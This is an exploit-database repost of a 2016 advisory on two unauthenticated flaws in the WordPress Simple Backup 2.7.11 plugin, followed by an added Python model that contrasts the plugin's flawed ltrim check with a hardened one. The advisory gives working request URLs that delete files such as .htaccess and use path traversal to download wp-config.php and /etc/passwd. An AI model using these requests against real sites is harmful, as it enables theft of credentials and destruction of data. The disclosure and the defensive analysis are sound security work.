0day.today - Biggest Exploit Database in the World.
WordPress Simple Backup 2.7.11 Plugin - Multiple Vulnerabilities
####################
# Meta information #
####################
# Exploit Title: WordPress plugin simple-backup - Multiple vulnerabilities
# Date: 2016-06-02
# Exploit Author: PizzaHatHacker [A] gmail [.] com
# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/
# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.11
# Tested on: simple-backup 2.7.11 & WordPress 4.4.2
#
# History :
# 2016-02-21 Contact requested on the vendor website via "Contact Us"
# 2016-02-24 Contact requested on the vendor website via "Support"
# 2016-03-09 Email to plugins@wordpress.org
# 2016-03-10 Acknowledged by WordPress team
# 2016-06-02 No information, no response, vulnerabilities not fixed,
#            disclosure of this document.
#

##################################
### 1. Arbitrary File Deletion ###
##################################

It is possible to remotely delete arbitrary files on the web server of WordPress blogs that have the simple-backup plugin installed and enabled. No authentication is required, and the default configuration of simple-backup is affected.

Example 1 : Delete "pizza.txt" in the WordPress root :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt

Example 2 : Delete the .htaccess file protecting the backup folder :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting

Note : When the 'download_backup_file' parameter is given a file path that does not exist, the PHP script exits prematurely with the message "Access Denied!" and therefore does not automatically regenerate the .htaccess file.

After this request, it may be possible (depending on the web server configuration) to browse the backup directory and download server backup files at this URL :
http://127.0.0.1/<WP-path>/simple-backup/

The backup archive files may contain all the WordPress files : configuration files (wp-config.php etc.), PHP source code (plugins, etc.), and a database dump (all table contents, WordPress user password hashes, etc.).

CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10

########################
### 2. File Download ###
########################

It is possible to download files from the web server of WordPress blogs that have the simple-backup plugin installed and enabled. No authentication is required, and the default configuration of simple-backup is affected.

Example 1 : Download the tools.php source file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=

Example 2 : Download a backup file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar
(If backups are performed automatically at predefined times, the backup file name is easy to guess, as it is derived from the current time.)

Moreover, the checks performed on the user-provided 'filename' parameter are insufficient :

simple-backup-manager.php:
function download_local_backup_file($filename){
    $filename = ltrim($filename, ".\/");

* Only logged-in AND authorised users (with permission to manage backups) should be allowed to download files
* The file name should match a backup file and must not be empty
* The input is not correctly checked for directory traversal (use PHP 'basename' instead of 'ltrim'): ltrim only strips leading '.', '/' and '\' characters, so a name that begins with a legitimate path component is passed through unchanged, '../' sequences included.

For example, in the special case where a folder 'oldBackups' is created inside the backup directory, it would be possible to download ANY file readable by the web server via direct requests to URLs of this kind :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd

CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS Base Score : 5
Impact Subscore : 2.9
Exploitability Subscore : 10

# 0day.today [2024-09-28] #
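The ltrim check discussed in the advisory, modelled in Python against the advisory's own payloads, with a hardened replacement beside it. This is an added example, not code from the advisory or from the simple-backup plugin: the directory layout, the 'oldBackups' sub-folder, the file contents and the backup-name pattern are constructed for the demonstration, and the user_can_manage flag stands in for WordPress's capability check. It also covers the plain "../" case the advisory does not spell out, to show why the author needed a real sub-folder in front of the traversal.

```python
import os
import re
import shutil
import tempfile

# Assumed backup-name pattern, generalised from the advisory's single example
# "backup-2016-02-21-111047.tar". Adjust to whatever the real plugin produces.
BACKUP_NAME = re.compile(r"^backup-\d{4}-\d{2}-\d{2}-\d{6}\.tar$")


def build_fixture():
    """Constructed layout mirroring the advisory: <WP-path>/simple-backup/ holds
    the backups, and the advisory's special case adds an 'oldBackups' folder
    inside it. Returns (wp_root, backup_dir)."""
    wp_root = tempfile.mkdtemp(prefix="wp-")
    backup_dir = os.path.join(wp_root, "simple-backup")
    os.makedirs(os.path.join(backup_dir, "oldBackups"))
    with open(os.path.join(wp_root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(backup_dir, "backup-2016-02-21-111047.tar"), "wb") as f:
        f.write(b"constructed tar payload")
    return wp_root, backup_dir


def plugin_style_resolve(backup_dir, filename):
    """Model of the plugin's check. PHP ltrim($filename, ".\\/") removes only
    LEADING '.', '\\' and '/' characters; the remainder is joined to the backup
    directory and served. Returns the real path that would be read, or None if
    no regular file exists there."""
    stripped = filename.lstrip("./\\")
    candidate = os.path.join(backup_dir, stripped)
    if not os.path.isfile(candidate):
        return None
    return os.path.realpath(candidate)


def hardened_resolve(backup_dir, filename, user_can_manage):
    """Check shaped by the advisory's three recommendations: the caller must be
    authorised (user_can_manage stands in for WordPress's capability check),
    the name must be non-empty and look like a backup file, basename() strips
    any directory component, and the resolved path must still live directly in
    the backup directory (guards against symlinked entries)."""
    if not user_can_manage:
        return None
    name = os.path.basename(filename)
    if not name or name != filename or not BACKUP_NAME.match(name):
        return None
    real_dir = os.path.realpath(backup_dir)
    real_path = os.path.realpath(os.path.join(real_dir, name))
    if os.path.dirname(real_path) != real_dir or not os.path.isfile(real_path):
        return None
    return real_path


def run_demo():
    """Runs both checks over the advisory's payloads. Paths are returned relative
    to the WordPress root so the outcome is readable; the fixture is removed
    afterwards."""
    wp_root, backup_dir = build_fixture()
    real_root = os.path.realpath(wp_root)
    payloads = {
        "legit": "backup-2016-02-21-111047.tar",
        # ltrim strips the leading "../../", so this one is "defended" by accident
        "plain_traversal": "../../wp-config.php",
        # starts with a real sub-folder, so ltrim leaves the "../.." in place
        "prefixed_traversal": "oldBackups/../../wp-config.php",
        # the page does not show why an empty name serves tools.php, so the
        # model just reports that nothing resolves; the hardened check rejects it
        "empty": "",
    }
    try:
        def rel(path):
            return None if path is None else os.path.relpath(path, real_root)

        return {
            label: {
                "plugin": rel(plugin_style_resolve(backup_dir, p)),
                "hardened": rel(hardened_resolve(backup_dir, p, user_can_manage=True)),
                "hardened_anon": rel(hardened_resolve(backup_dir, p, user_can_manage=False)),
            }
            for label, p in payloads.items()
        }
    finally:
        shutil.rmtree(wp_root)


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label:20s} plugin={outcome['plugin']!r:50s} hardened={outcome['hardened']!r}")
```

The point the model makes concrete: "../../wp-config.php" really is neutralised by ltrim (it collapses to "wp-config.php" inside the backup folder, where no such file exists), which is why the advisory's bypass needs a genuine sub-folder in front of the "../" sequence; any prefix ltrim does not strip carries the traversal through. The hardened version rejects every traversal on the name alone, before touching the filesystem, and still refuses unauthenticated callers for a legitimate name.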